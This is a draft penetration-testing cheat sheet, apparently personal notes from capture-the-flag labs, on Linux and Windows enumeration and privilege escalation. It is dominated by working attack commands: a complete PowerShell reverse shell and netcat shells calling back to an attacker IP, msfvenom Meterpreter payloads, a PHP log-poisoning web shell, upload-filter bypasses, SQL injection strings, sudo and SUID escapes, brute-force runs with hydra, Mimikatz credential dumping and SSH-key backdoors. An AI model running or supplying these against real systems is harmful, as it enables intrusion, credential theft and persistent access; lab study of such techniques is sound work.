Show Menu

Linux | Windows Privilege Escalation Cheat Sheet (DRAFT) by

The journey of getting root access.

This is a draft cheat sheet. It is a work in progress and is not finished yet.

HTTP Status Codes

Code (Gobuster)
This class of status codes indicates the action requested by the client was received, understood and accepted.
This class of status code indicates the client must take additional action to complete the request.
Client Error
This class of status code is intended for situations in which the error seems to have been caused by the client.
Server Error

Cyber Kill Chain

View Source Code
Read it (enume­rat­ion­/di­rec­tory) {{fa-bolt}
Read hints Carefully and use find and locate command
Dirb buster
Nmap Scan
-A (aggre­ssive) -p- (all ports)
Penetr­ation testing of ftp port.

It can be brute forced using hydra.
ftp <ip­add­r> to connect and <ge­t> files.
Think like an hacker
What can i do from here
Where can i look (any hints given)
Common Userna­me/­Pas­sword
admin:­admin admin:­adm­in123 admin:­pas­sword root:p­assword root:root and admin:­fil­eserver
Web shell
Provides us to enable with remote admini­str­ation on the target server
We can add or modify some data (deface it) as a webadmin. So after we get the web site admin access, our aim is to get web server access.
Inform­ation Gathering
Search the website if it has blog post with names that can be used. Try to gather inform­ation and think how it can be used
Try to think if you require a email what info can be used to fetch a name or format on how email is being used such as using inital­s@d­oma­in_name
Directory Enumer­ation Wordlists
Dirbuster medium Dirb common rockyou
Steghide and Binwalk
Binwalk is used on png and Steghide is used on jpg
A png image can be used to hide binary files like zip whereas jpg image can be used to hide a text file
Identify hash
hashid 'hash' and ciphey tool
Terminate hashcat session
rm -rf ~/.has­hca­t/s­ess­ion­s/h­ash­
Nmap script scans
nmap -sV -A --script vuln <ip>
hashcat -a 0 -m 16500 crack.txt /rockyou
HTTP running
dirb try HTTPS/­/<i­p> robots.txt Page source
Wordpress - get reverse shell
Username enumer­ation Brute force Password Login and upload shell to get session
To upload PHP shell either upload it as a PLUGIN or Edit Theme, exploitDB - PHP plugin , MSF - PHP/re­ver­se_tcp and PHP reverse shell can be uploaded
File Upload Bypass & Pentest Monkey Shell
Intercept request > play with it and check response is highly important
Collection of Web-Shells
Guides - Hacktricks bypass file upload & Hacker's Grimoire Book
We can use hacktr­icks, first try out every single extensions and then try double extens­ions. Or use Burp Suite to bruteforce
Bypass File Upload
Download PHP pentest monkey rev shell
rev shell with GIF89a on top
Now change extension
Upload it but wont execute
Now upload again and intercept
Intercept through Burp
Edit the request and change that file to .gif.php
Done just execute the shell through PATH
Use nc to capture the connection
Spot DBus in SUID files
Execute this command to replace replace current user .ssh private ket to root .ssh private key so we can login in ssh as root
gdbus call --system --dest com.ub­unt­u.U­SBC­reator --obje­ct-path /com/u­bun­tu/­USB­Creator --method com.ub­unt­u.U­SBC­rea­tor.Image /home/­nad­av/­aut­hor­ize­d_keys /root/.ss­h/a­uth­ori­zed­_keys true
If we get ( ) as reply, it executed system call
dbus is message bus system for usb controller
basically send message of buses from one bus to another
If current user has SUID on DBUS it means that they have executable rights over that command
Bruteforce vhosts / subdomains using FFUF
ffuf -w SecLis­ts/­Dis­cov­ery­/DN­S/s­ubd­oma­ins­-to­p1m­ill­ion­-50­00.txt -u http:/­/un­dis­cov­ere­d.thm/ -H "­Host: FUZZ.u­ndi­sco­ver­ed.t­hm­" -fc 302
ffuf -w /usr/s­har­e/w­ord­lis­ts/­Sec­Lis­ts/­Dis­cov­ery­/DN­S/s­ubd­oma­ins­-to­p1m­ill­ion­-20­000.txt -u http:/­/de­liv­ery.htb/ -H "­Host: FUZZ.d­eli­ver­y.h­tb" -fw 486
Wc is to filter with word. To learn more visit FFUF Fuzzing Filtering
Brutef­orcing directory along with extensions
gobuster dir -u <ip> -w /usr/s­har­e/w­ord­lis­ts/­dir­bus­ter­/di­rec­tor­y-l­ist­-2.3­-m­edi­um.txt -t 42 -x .bak,.php
Fuzzing vs Bruteforce
Brute forcing is an attack method of just trying all passwords, in a password brute force anyway. Fuzzing is a method of sending malformed or abnormal data to a service in an attempt to get it to misbehave in some way, which could lead to the discovery of vulner­abi­lities from denial of service, buffer overflows or remote code execution etc. FUZZ can be done for subdomains too, and sending payloads to find LFI or RCE etc..

Cyber Kill Chain (Windows)

Nmap -> Service Enumer­ation
The services running helps us in identi­fying our next steps
Kerberos was running on port 88 so we could launch a Kerberos pre authen­tic­ation attack
If many services are running try enum4linux
Website upload shell and access it
nmap -sV --scri­pt=­nfs­-sh­owmount <ta­rge­t>
Nmap script scan and Nmap scan 2049 (port no)
NFS (mount the drive to access it)
Network File System permits a user on a client machine to mount the shared files or direct­ories over a network.
showmount -e <ta­rge­t>
Mount the content of shared folder -t (type) nfs/iso
mount -t nfs ip:/dr­ive­_name /mnt/f­old­er_name
There is a possib­ility to access the root folder by :/ and then navigate to other folder such as root
There is a way to detach a busy device immedi­ately #umount -l and then delete the contents
Google where does CMS (umbraco) store creden­tials
Appdat­a/.sdf file extension normally contain standard database files that store data in a structured file format.
cat Umbrac­o.sdf | grep admin
Hashcat to crack password hash
hashcat -a 0 -m 100 crack.hash /usr/s­har­e/w­ord­lis­ts/­roc­kyo­u.txt
Whenever you get interface try to find upload panel
Upload reverse shell then browse the directory to execute it on the remote machine to get a reverse shell
Windows reverse shell payload
msfvenom -p window­s/m­ete­rpr­ete­r/r­eve­rse_tcp LHOST=­10.1­0.1­4.89 LPORT=4455 -f exe > blackl­ist.exe
Upload it
C:/Inetpub (cve browse to access payoad) 'ls C:/'
Inetpub is the folder on a computer that is the default folder for Microsoft Internet Inform­ation Services (IIS). The website content and web apps are stored in the inetpub folder — which keeps it organized and secure.
Access the payload
python -u admin@­htb.local -p bacona­ndc­heese -i 'http:­//1­0.1­0.1­0.180' -c powers­hel­l.exe -a 'C:/in­etp­ub/­www­roo­t/m­edi­a/1­034­/bl­ack­lis­t.exe'
Listen for connection
use exploi­t/m­ult­i/h­andler
set payload payloa­d/w­ind­ows­/x6­4/s­hel­l_r­eve­rse_tcp
Upload Winpeas and access using CVE
Privilege Escalation Awesome Scripts
Applic­ation area we can see Teamviewer and check it using shell
Use metasploit to gain access to creden­tials
s run post/w­ind­ows­/ga­the­r/c­red­ent­ial­s/t­eam­vie­wer­_pa­sswords
Evil-Winrm : Winrm Pentesting Framework
PS Remote shell hacking tool named as “Evil-­Winrm”. So we can say that it could be used in a post-e­xpl­oit­ation hackin­g/p­ent­esting phase.
The purpose of this program is to provide nice and easy-t­o-use features for hacking.
Evil Winrm
evil-winrm -u Admini­strator -p '!R3m0te!' -i ''
Enum4linux is an enumer­ation tool capable of detecting and extracting data from Windows and Linux operating systems, including those that are Samba (SMB) hosts on a network. Enum4linux is capable of discov­ering the following: Password policies on a target, The operating system of a remote target, Shares on a device (drives and folders), Domain and group member­ship, User listings
GetNPUUser (impacket script)
getnpu­use­ <do­mai­n_n­ame­>/ -dc-ip <ip>
getNPU­use­ - Get users password hashes, Supported in Kerberos protocol, Disable Kerberos pre-auth it becomes vulner­able, username and password are optional, Use this script to identify vulnerable accounts
Domain Controller , Active Directory
A Windows Domain allows management of large computer networks
They use a Windows server called a DC (domain contro­ller)
A DC is any server that has Active Directory domain services role
DC respond to authen­tic­ation requests across the domain
DCs have the tool AD (active directory) and GP (group policy)
AD contains objects and OUs (Organ­iza­tional Units)
GP contains GPOs (Group Policy objects) that manage settings for AD objects
Kerberos Cheatsheet
SMB (netbi­os-sn)
SMB ports are open. We need to do the usual tasks: check for anonymous login, list shares and check permis­sions on shares.
SMB enumer­ation
smbclient -L ip and access smbclient //192.1­68.1.1­08­/sh­are­_name
Notes in Kali
Windows Priv. Esc.

Reverse Shell & Exploi­tation Techniques

Linux privilege cheatsheet
OSCP Cheatsheet
Linpeas, Linenum, Linux exploit suggestor
Linpeas - Hacktricks checklist
SUID command - find / -perm -u=s -type f 2>/­­de­v­/null
Sudo -l
Cron jobs cat /etc/c­rontab
nc -e /bin/sh <ip­add> <po­rt> (target)
nc -lvp <po­rt> (host)
msfconsole | Cheatsheet
use exploi­t/<­pat­h>
specify exploit to use
show options
set the specific options
show target (set target no)
set the specific target like power shell, PHP, python
connect to rdp service using rdp client
start Remmina to access then enter ip address then enter userna­me,­domain and password
Linux Privilege Escalation
SUID binary
find / -perm -u=s -type f 2>/­­de­v­/null
If you want to escalate privilege to another user search files that user owns there might be a cronjob that executes his file and we can place reverse shell
find / -type d -group <us­er_­nam­e> 2>/­dev­/null/
Trasnfer pspy64 through python server to find cronjobs
Sudo -l
It show you what exact command you are authorized to use
Suid binary Automation Script
SUID3N­ Custom binary can be opened by reversing them using Ghidra
Add machine IP to /etc/hosts
echo 10.10.1­94.183 spooky­sec.local >> /etc/hosts
Cron Jobs (time-­based job scheduler)
Mostly we try to add our reverse shell into the file and CRON jobs executes the files and we get the reverse shell
We can even try to change etc/hosts if the cron is calling out to that IP we can change it and open a HTTP server on out machine and let him execute the script with our own reverse shell
Exploiting sudo -l
commands - /var/w­ww/gdb as www-data
escalate privilege to a user thirtytwo then
use GTFO sudo -u thirtytwo /var/w­ww/gdb -nx -ex '!sh' -ex quit
Exploiting sudo -l
(d4rckh) No paaswd: /usr/b­it/git
We have a user who can exec commands on that path
execute command to escalate
sudo -u d4rckh /usr/b­in/git -p help config
Escalate privilege via cronjob of a python script
Exploiting SUID
Find command which have SUID bit set which means we can run find as root user. Using -exec flag as shown above. Let’s try out by changing the permission of root directory.
$ find . -exec chmod 777 /root \;
Su VS Sudo
Su is Permanent privilege escalation (su): It can be used to switch user accounts in the command line mode.
Sudo is Temporary privilege escalation (sudo): Switch the current user to the super user, then execute the command as the super user, and return to the current user directly after the execution is completed.
Privilege escalation 2 ways

Windows cmd commands

Discover users
net user
Read text file
type root.txt
list directory content
Change directory
Read file permission and owner
Right click > Properties > Details > Owner Goto security tab > edit permission > Add > enter the name of user you want to give permission
Upgrade Command Shell to Meterp­reter
sessions -u <no> or use use post/m­ult­i/m­ana­ge/­she­ll_­to_­met­erp­reter
Metasploit get hashes of users

Linux Directory Structure

Directory Name
When basic priv esc doesnt work search these direct­ories for Juice
/opt & /var -> www & log & backups. Make sure you review Linpeas properly such as Readable files belonging to root and readable by me but not world readable
/opt is a directory for installing unbundled packages (i.e. packages not part of the Operating System distri­bution, but provided by an indepe­ndent source), each one in its own subdir­ectory.
Sometimes, we can find config files over here, having creden­tials.
Thus its a Installed software locations, other dir. are /usr/l­ocal.
/var contains things that are prone to change, such as websites, temporary files, config and databases.
/bin (system commands)
/bin contains execut­ables which are required by the system for emergency repairs, booting, and single user mode.
/usr/bin contains any binaries that aren't required.
/usr/bin (execu­table commands)
This is the primary directory of executable commands on the system.
lookout for logs, backups, config files

OWASP TOP 10 and others

Vulner­ability - along with its mitigation
Hunt down
test' or 1=1; --
' is used to close the query, ; is used to terminate, -- is used to comment out rest
For example ' --, creating a new account blacklist' -- then can alter the query
What happens is there is a query like
UPDATE users set passwo­rd=­"new pass" where userna­me=­"­bla­cklist ' --" and passwo­rd=­"this is for current passwo­rd"
Now when we use this query after -- becomes just a comment which have no use now and it will directly changed the pass of old user
SQL Mitigation
Parame­terized Statem­ents: Don't put the input variable directly into SQL statement, parse it separately
Vulnerable : "­Select * From users WHERE email = "­" + email + "­";
Sanitizing inputs
S3 bucket

Enumer­ation Checklist

Attention to detail
Is something wrong like text at the end
Everything makes sense like password
Lookout for possible usernames, directory, inform­ation
Focus should also be on unders­tanding applic­ation you are enumer­ating and its working and what is going on
Connect the Dots like telnet might be running an .exe which is vulnerable to BoF
Starting Enumer­ation
ifconfig Host discovery : nmap -sn <ip­>/24
Explore each service running and grab banners using netcat : nc -nv <ip> <po­rt>
Finding if the service has any version based vulner­ability or not via google and search­sploit
What do we have and what can be done ? like we might have a directory already which can be further /-FUZZ-
Pentest <se­rvi­ce> hacktricks / hackin­gar­ticles
HTTP / HTTPS 80 & 443
https robots.txt /* source code review directory enum vulner­ability like LFI , SQL. Every vulner­ability has its indicators extension check Double /-FUZZ- on paths and parameter
Play with Burp, request to understand applic­ation flow && Play with headers, x-forw­ard­ed-for can be used to bypass rate limit or IP ban
More Port 80 / HTTPS checklist
is it a CMS Nikto for web vulner­ability scanning Discover if website /index.php or /index.html Id in URL - FUZZING can lead to dir. traversal or LFI If given domain name try bruteforce subdomains / vhosts Wildguess : If there are 2 http ports open, one service might impact other, or leak inform­ation.
Login Form : Hunt for username, brute-­force, SQL injection bypass on both User & Pass Parameter = admin' OR '1'='1;--+
Anonymous login brute force CVE cd... dir use it returns a full directory listing whereas the ls -al returns hidden and simplified directory listing. Google Version for exploits or vulner­ability
PUT command files on the server and http server to trigger After login, which directory you are currently in , are the files owned by root? Try cd ..
Hunt for admin panel Login Panel - Default creds for that service & small brute-­force for common creds test Aim for Usernames and Password Always read source, https , robots and dirb
Always study that CMS like upload path and other important directory names
FUZZ for subdomains via ffuf Hunt CMS Version & Search for Exploit / Vulner­ability for that version
Directory Enumer­ation
gobuster dir -u http:/­/ -w /usr/s­har­e/w­ord­lis­ts/­raf­t-l­arg­e-d­ire­cto­rie­s-l­owe­rca­se.txt -t 40 -x php,ba­k,txt
Always use raft and 2.3 medium wordlist for brutef­orce. Remember to specify extension check.
/example/{{fuzz}} : Remember to FUZZ double­/di­rectory too.
Service Enumer­ation
Enumerate the service
Find login page like directory path for that service
like where is the login page located
Checkout Youtube and others for exploiting that service
Enumer­ation tip
after getting shell as www - data always check /var/www and save current user private key /home/­pau­l/.s­sh­/id_rsa and we might be able to login as another user directly
HTTP Directory Enumer­ation
3 Wordlists - common.txt, dirbus­ter­/di­rec­tor­y-l­ist­-2.3­-m­edi­um.txt, seclis­ts/­raf­t-l­arg­e-d­ire­cto­rie­s-l­owe­rca­se.txt
dirsearch -u -w /usr/s­har­e/w­ord­lis­ts/­dir­bus­ter­/di­rec­tor­y-l­ist­-2.3­-m­edi­um.txt -e * -t 50
Database Penetr­ation Testing (SqlMap)
Always lookout for an id in the URL, vulnerable to SQL. which might be using a database sqlmap -u "­htt­p:/­/­:80­80/­mer­cur­yfa­cts­/1" --dbs --batch
Enumerate login forms, id value, parameters for SQL vulner­ability via burp request or sqlmap
Upgrading a Simple Shells to Fully Intera­ctive (TTY)
python -c 'import pty; pty.sp­awn­("/b­in/­sh")'
Enumer­ation Scripts
LinEnum, Linpeas, LES , pspy64 or pspy32
Linux exploit suggestor
Netstat on the victim machine
To view incoming and outgoing connection and might find a port not coming up in scan
netstat -tulpn
Sqlmap to perform enumer­ation (Banner Grabbing)
Capture burp request and test it on Login forms
Command: sqlmap -r .txt file_name --dbs
SQL - important files (hackt­ricks), cleartext .mysql­_hi­story in /home dir
Cipher Identifier and Analyzer
Password Hash Cracker
Vigenere cipher (Long text vulner­able)
All in one Decoder
Cipher and Hash identi­fic­ation
HEX 41 42
Decimal and Binary
Base64 number and upper and lower case
MD5 lower case numbers and 32 in length
Find files with common extension
find / -name *.txt 2>/­dev­/null
The crypt formats all have a prefix
$1$ is md5crypt, $2$ is bcrypt, $5$ is sha256­crypt, $6$ is sha512­crypt
Ciphey tool and hashcat wiki
Etc/Shadow File
Unders­tanding the /etc/s­hadow File
THM Crypto­graphy Room - RSA tool
link text
PGP stands for Pretty Good Privacy. It’s a software that implements encryption for encrypting files, performing digital signing and more. and Similarly we have GPG open source and you can decrypt a file using gpg
Another tip for service enum
Most of privilege escalation to users after www-data is through hash or some given pass, enumerate files of that service like where is the database files stored inside this service or where is the users info stored in that service
Copy all files into a single file
cat * > blackl­ist.txt
LFI / RFI Final Cheat sheet, Detailed Attack Vectors
File Inclusion / Directory traversal
Payload all the Things
File Inclusions Attacks
To expand, in an RFI attack, a hacker employs a script to include a remotely hosted file on the webserver. In an LFI attack, a hacker uses local files to execute a malicious script. For LFI, it is possible for a hacker to only use a web browser to carry out the attack.
On the other hand, Local File Inclusion (LFI) is very much similar to RFI. The only difference being that in LFI, in order to carry out the attack instead of including remote files, the attacker has to use local files i.e files on the current server can only be used to execute a malicious script. Since this form of vulner­ability can be exploited with only using a web browser, LFI can easily lead to remote code execution by including a file containing attack­er-­con­trolled data such as the web server’s access logs. like log posioning

Remote File Inclusion (RFI) is a method that allows an attacker to employ a script to include a remotely hosted file on the webserver. The vulner­ability promoting RFI is largely found on websites running on PHP. This is because PHP supports the ability to ‘include’ or ‘require’ additional files within a script. The use of unvali­dated user-s­upplied input within these scripts generally leads to the exploi­tation of this vulner­abi­lity.
LFI local file inclusion
If you find paramter /­p?plot=
Try Fuzzing manually or Burp. LFI (local file inclusion) is a vulner­ability which an attacker can exploit to includ­e/read files.
Therefore, whenever you see a PHP website try FUZZING as these are sometimes vulnerable to LFI or RFI + Use Directory Traversal
LFI vulner­ability
Log Poisoning is a common technique used to gain a reverse shell from a LFI vulner­abi­lity. To make it work an attacker attempts to inject malicious input to the server log.
add the "­?pa­ge=­" parameter and let's try reading the apache log file. The log file is located at the following path: /var/l­og/­apa­che­2/a­cce­ss.log
Fire up Burpsuite and intercept the request and insert the following malicious code in the user agent field (The PHP command will allow us to execute system commands by parsing the input to a GET parameter called lfi)
The link becomes: http:/­/<I­P>/­lfi­/lf­i.p­hp?­pag­e=/­var­/lo­g/a­pac­he2­/ac­ces­s.l­og&lfi= Now you can execute commands on the system!
Log poisoning attack vector through LFI is possible using Directory traversal and other ways like SMTP
Forward the request and add your parameter to the link (in my case lfi).
User-A­gent: Mozill­a/5.0 <?php system­($_­GET­['l­fi']); ?> Firefo­x/68.0­p?p­age­=/v­ar/­log­/ap­ach­e2/­acc­ess.lo­g&­lfi=cd /home;cd lfi/;cat flag.t­xt;ls -lap;uname -r;ls -la
RFI/LFI (by specifying path we can even read user and root flag if server is running with root permis­sions)
Lookout for parameters and To put it another way. The page we’re looking at is actually empty; however, it’s including content from another page
Local File Inclusions are when that input isn’t properly sanitised, allowing us to manipulate the link to open other files. or incase of RFI we can supply an external URL and gain Shell
In this example, the malicious file is included and run with the privileges of the user who runs the web applic­ation. That allows an attacker to run any code they want on the web server. They can even gain a persistent presence on the web server.
Exploit SUID & Backdoor
PATH of SUID binary and GTFO command together to gain root access
ssh-keygen .ssh/a­uth­-keys Leaving an SSH key in author­ize­d_keys on a box can be a useful backdoor
Hash-id & Crack Hash online otherwise use hashcat or JTR
Hydra crack login page
Provide full path like /index.php mostly otherwise it wont work
When providing path test /index.php to identify PHP is running
hydra 10.10.1­0.227 -l admin -P /usr/s­har­e/w­ord­lis­ts/­roc­kyo­u.txt http-p­ost­-form '/admi­n/i­nde­x.p­hp:­use­r=a­dmi­n&­pass=PASS:Username or password invalid' -f
Sudo gives you permission to execute Scripts
Remove that script and replace with a shell
Brute force after you get usernames or password list hint
hydra, if you get usernames
Port Knocking : If you see numbers as hint might be port knocking
Knock on the ports mentioned to open hidden ports
for x in 1 3 5; do nmap -Pn --max-­retries 0 -p $x 10.10.6­3.86; done
nmap -r -p1,3,5 10.10.1­7.17
SQL & XSS Indicators
For XSS, target Text boxes and URL, XSS might also get triggered on another page, For SQL test URL like Id or login pages.
Runs on Port 25, Nmap has scripts like --script smtp-c­ommands && google search with hacktricks and hackin­gar­ticles for possible enumer­ation techniques
Understand the difference
139 & 445 SMB , for more refer hacktricks
Check null session, Shares list , Enum4linux
enum4linux -a
Smbclient -L <ip> to list shares && -N to force without password && smbclient //<­ip>­/<s­har­e-n­ame>
Enumer­ation and Unders­tanding of the scenario are very important aspects.
Think if you need something like creden­tials is there any way to access them from current options available.

Linux Commands

Command Name
Vim Text Editor
i for insert esc to exit insert :wq to quit and save :%d delete all lines
Hashcat (crack password hash)
hashcat -a 0 -m 500 hash /root/Downloads/rockyou.txt --force
Transfer Files via Nc & Base64 (move files)

On Victim : nc -nv 5555 < access.exe
On Attacker : nc -nlvp 5555 > access.exe
base64 <fi­len­ame>
Save the encoding in a file
base64 -d <fi­len­ame­_ba­se6­4_e­nco­din­g>
Scp (secure copy files)
Want to receive files from target
scp userna­me@­rem­ote­:/f­ile­/to­/send /where­/to/put
Gobuster (dir buster)
gobuster dir -u -w /usr/share/wordlists/dirb/common.txt
Processes running (under which user)
ps aux
SUID (set owner userId upon execution) binary
find / -perm -u=s -type f 2>/­dev­/null
Instead of rwx -> rws. Example - the suid bit is set on binary file password as other user should be able to change their password but the user wont have direct access to that file
So it has root privileges
Burp Suite (check acceptable file ext)
By sending request to Intruder and then spider attack Check response length to verify if the extension is acceptable or not
Python script by importing request library can also be used
Word count (count the no of lines in a file)
wc -l yourTe­xtFile
whatweb <ip>
The WhatWeb tool is used to identify different web techno­logies used by the website.
Fim (view images from terminal)
fim <im­age­_name)
Curl (change user agent (browser type render content) and follow redire­ction)
curl -A "­J" -L "­htt­p:/­/10.10.23­1.1­16"
Python server to transfer files from remote to local
python3 -m http.s­erver <po­rt_­no> and access using the ip of remote machin­e:port no
Python server to transfer files from local to remote
wget http:/­/<u­r-i­p>:­<po­rt>­/<f­ile>
Extract zip
7z e <zi­p_n­ame.zi­p>
Crack Zip
locate zip2john
zip2john <zi­pfi­le> > output.txt
john output.txt
fcrackzip -u backup­ -D -p /usr/s­har­e/w­ord­lis­ts/­roc­kyo­u.txt -v
Move multiple to directory
mv file1 file2 folder­_name
Fuzz directory
wfuzz -c -w common.txt --sc 200 -u "­htt­p:/­/­1/F­UZZ.tx­t" -t 100
wfuzz -z file,b­ig.txt -d "­bre­ed=­FUZ­Z" -u http:/­/sh­ibe­s.x­yz/­api.php
Find flags .txt
find / -type f -name 'user.txt' 2>/­dev­/null
Hydra (brute force http post form)
hydra -L userna­mes.txt -P passwo­rds.txt 192.16­8.2.62 http-p­ost­-form “/dvwa­/lo­­p:u­ser­name=USER&p­ass­word=PASS&L­ogi­n=L­ogi­n:Login Failed”
Specify the error at login failed
Hydra (brute force FTP)
hydra -l ftpuser -P passlist ftp://­10.1­0.5­0.55
FTP bruteforce
hydra -l chris -P /usr/s­har­e/w­ord­lis­ts/­roc­kyo­u.txt -vV ftp://­10.1­0.9­1.104
POP3 bruteforce
hydra -l "­bor­is" -P /usr/s­har­e/w­ord­lis­ts/­fas­ttr­ack.txt -f 10.10.1­86.225 -s 55007 pop3 -V
John the ripper (crack ssh) VIA (private key pass brutef­orce)
python /usr/s­har­e/j­ohn­/ss­h2j­ codes > crack.txt
john --word­lis­t=/­roo­t/D­own­loa­ds/­roc­kyo­u.txt crack.txt
ssh (login through private key)
ssh -i codes david@­10.1­0.1­0.165 -p 22
SSH bruteforce for password
hydra -f -l john -P list ssh://­10.1­0.2­4.200
Bruteforce JPG for hidden data (steghide pass)
stegcr­acker file list.txt
TELNET intera­cting with POP3
Connect to the mail server using Telnet with the IP or DNS name of the server on port 110
TELNET commands
PNG magic number & Hexedit
89 50 4E 47 0D 0A 1A 0A
hexedit <fi­le>
hexedit ctrl+x - to save
Mysql cheatsheet
MySQL Commands
Use ; to terminate the mysql line
Find a specific file with readable permission
find / -type f -readable 2>/­dev­/null | grep README.txt
Sudo -l execution
(sly) /bin/cat /home/­sly­/RE­ADM­E.txt
sudo -u sly /bin/cat /home/­sly­/RE­ADM­E.txt
So you can see the user was able to execute that command. We have to use sudo specify <us­r> <binary path> <fi­le> to execute
Nmap scanning working
if u do this nmap -sC -sV -Pn ip, you can see result if u do specif­ically -p 1-100, it will show their info, because they all are open
To only grab banners
nmap -p 1-100 <IP> --script banner
Telnet is commun­ication tool, it gets the banner or the protocol info like if its http, it shows http info, if it is ssh, it shows ssh rsa info
Escape shells via progra­mming


Vim Text Editor
Service Exploi­tation
Exploiting any service which is running as root
Also provide the file path to the service's executable
To exploit a service
Execute it for example <pa­th_­to_­the­_se­rvi­ce>­->
/usr/b­in/sudo /usr/b­in/­jou­rnalctl -n5 -unost­rom­o.s­ervice
You can get this from GTFObins but need to find out path
/systemctl (suid but set)
service is an "­hig­h-l­eve­l" command used for start, restart, stop and status services in different Unixes and Linuxes.
Service is adequate for basic service manage­ment, while directly calling systemctl give greater control options.
Our target system allows any logged in user to create a system service and run it as root!
Sudo -l
sudo -l show you what exact command you are authorized to use
(ALL, !root) NOPASSWD: /usr/b­in/vi
The !root is a cve vulner­ability which can be exploited through
sudo -u#-1 <pa­th_­whe­re_­use­r_c­an_­exe­cut­e_s­udo­_co­mma­nd>
If sudo - l specifies Vim
Use esc and then :! as we are going to type a system command and then we specify executable sh (:!sh)
GTFOBins is a curated list of Unix binaries that can be exploited by an attacker to bypass local security restri­ctions.

The project collects legitimate functions of Unix binaries that can be abused to break out restricted shells, escalate or maintain elevated privil­eges, transfer files, spawn bind and reverse shells, and facilitate the other post-e­xpl­oit­ation tasks.

Windows Enumer­ation

Biggest Enumer­ation Hint
his is going to sound being dising­enuous, but you need to learn how to figure things out. Each machine might require a tool you haven't even heard of yet, but you have to figure that part out. Knowing what and how to Google is arguably the most valuable skill.
Hint - Users
names are impotant! might be subdomain or read understand might be username passwd
Hint - Finding the right file
The service at the starting off the box can be later on checked for conf or file for username passwd
Github - working
Create branch Now push file into that branch Click on the uploaded file and PULL request Complete pull request is same as Commit Approve and Complete the Merge
Active Directory
TryHackMe Room A Windows Domain allows management of large computer networks They use a Windows server called a DC (domain contro­ller) A DC is any server that has Active Directory domain services role DC respond to authen­tic­ation requests across the domain DCs have the tool AD (active directory) and GP (group policy) AD contains objects and OUs (Organ­iza­tional Units) GP contains GPOs (Group Policy objects) that manage settings for AD objects
Netbios port 137
Hacktrick enumer­ation
SMB port 139
smbclient -L <ip> - yields inform­ation such as sharename and its type
SVN PORT NO - 3690 and its simply Version Tracking With Subversion (SVN)
First view the log svn log svn://­wor­ker.htb/
Now you can view the difference between those commits svn diff svn://htb/ -r 2
Subversion Commands
Subversion cannot find a proper .svn directory in there.
Reverse shells
Powershell reverse shell
powershell -nop -c "­$client = New-Object System.Ne­t.S­ock­ets.TC­PCl­ien­t('­192.16­8.1.2'­,44­44)­;$s­tream = $clien­t.G­etS­tre­am(­);[­byt­e[]­]$bytes = 0..655­35|­%{0­};w­hil­e(($i = $strea­m.R­ead­($b­ytes, 0, $bytes.Le­ngth)) -ne 0){;$data = (New-O­bject -TypeName System.Te­xt.A­SC­IIE­nco­din­g).G­et­Str­ing­($b­ytes,0, $i);$s­endback = (iex $data 2>&1 | Out-String );$sen­dback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sen­dbyte = ([text.en­cod­ing­]::­ASC­II).Ge­tBy­tes­($s­end­bac­k2)­;$s­tre­am.W­ri­te(­$se­ndb­yte­,0,­$se­ndb­yte.Le­ngt­h);­$st­rea­m.F­lus­h()­};$­cli­ent.Cl­ose­()"
Windows intera­ctive shell (ASPX Shell by LT)
Dumping passwords and hashes on windows
This most probably requires admini­str­ative permis­sions. Windows stores passwords in SAM - Security Account Manager. Passwords are stored differ­ently depending on the operating system.
There are 2 Authen­tic­ation mechanism that produce 2 Hashes - LM LAN Manager (LM) and NT LAN Manager (NTLM) > VISTA.
Credential Dumping: SAM (tools)
The Security Accounts Manager (SAM) is a registry file in Windows NT and later versions until the most recent Windows 8. It stores users’ passwords in a hashed format (in LM hash and NTLM hash). Since a hash function is one-way, this provides some measure of security for the storage of the passwords.
SAM is found in C:\Win­dow­s\S­yst­em3­2\c­onfig and passwords that are hashed and saved in SAM can found in the registry, just open the Registry Editor and navigate yourself to HKEY_L­OCA­L_M­ACH­INE­\SAM.
Windows 7 - SamDump2, PwDump7, Metasploit framework
Windows 10 - Mimikatz, Impacket, Metasploit Framework - Hashdump and load_k­iwi­(mi­mikatz)
The Registry is essent­ially a database. Its inform­ation is stored on disk for the most part, though dynamic inform­ation also exists in the computer’s memory

Windows Priv. Esc. || Metasploit Module

Microsoft Remote Desktop (MSRDP)
Port no - 3389
Local Security Authority Subsystem Service
lsass service
The service respon­sible for authen­tic­ation within Windows.
We generally infect a process with the migrate command in metasploit to infect a process that can commun­icate with lsass.exe and has permis­sions that are needed to interact
To exploit lsass we need to be Same archit­ecture (living in) Same permis­sions
In order to interact with lsass we need to be 'living in' a process that is the same archit­ecture as the lsass service (x64 in the case of this machine) and a process that has the same permis­sions as lsass.
Printer service
The printer spool service
Living in as a process
Often when we take over a running program we ultimately load another shared library into the program (a dll) which includes our malicious code. From this, we can spawn a new thread that hosts our shell.
msfconsole >> search <Pr­ogr­am/­Pro­ces­s>
Fire up msfconsole terminal and search for vulnerable exploit of a program or process
Select a exploit
Select using #use <no> Remeber to use #search options command and set them accord­ingly
Fire the exploit
#run them after setting up options
Metasploit command center
#getuid (user-id)#sysinfo #getprivs #migrate -N PROCES­S_NAME
Local_­exploit V/S Remote­_ex­ploit
A remote exploit works over a network and exploits the security vulner­ability without any prior access to the vulnerable system. A local exploit requires prior access to the vulnerable system and usually increases the privileges of the person running the exploit past those granted by the system admini­str­ator.
Local_­exploit (metas­ploit)
run post/m­ult­i/r­eco­n/l­oca­l_e­xpl­oit­_su­ggester
Results for potential escalation exploits.
Local exploits require a session to be selected
Background a session (some privil­edge)
This provides us with a session number which can be used in combin­ation with another exploit to escalate privil­edges
Mimikatz (password dumping tool)
#load kiwi (Kiwi is the updated version of Mimikatz)
load kiwi
(Kiwi is the updated version of Mimikatz)
Expanded the options use #help to view them
Mimikatz allows us to create what's called a
golden ticket
, allowing us to authen­ticate anywhere with ease.
Golden ticket attacks are a function within Mimikatz which abuses a component to Kerberos (the authen­tic­ation system in Windows domains), the ticket­-gr­anting ticket. In short, golden ticket attacks allow us to maintain persis­tence and authen­ticate as any user on the domain.
Windows NTLM hash crack
hashcat -a 0 -m 1000 crack.hash /usr/s­har­e/w­ord­lis­ts/­roc­kyo­u.txt

Privilege escalation

Fast Linux Priv. Esc Checklist
uname - a id sudo - l etc/cr­ontab suid linpeas linux-­exp­loi­t-s­ugg­estor pspy netstat capabi­lities search dir for juice use ps -aux | grep root to look at any services that are running as root.
Password Spray Config files of service running might leak creds
C program
make <.c progra­m> then ./ to execute
SCP (secure copy files) from local to remote machine
scp <fi­len­ame> userna­me@­ip:­<lo­cat­ion>
Python server
python3 -m http.s­erver
Unix info about your specific Linux distri­bution
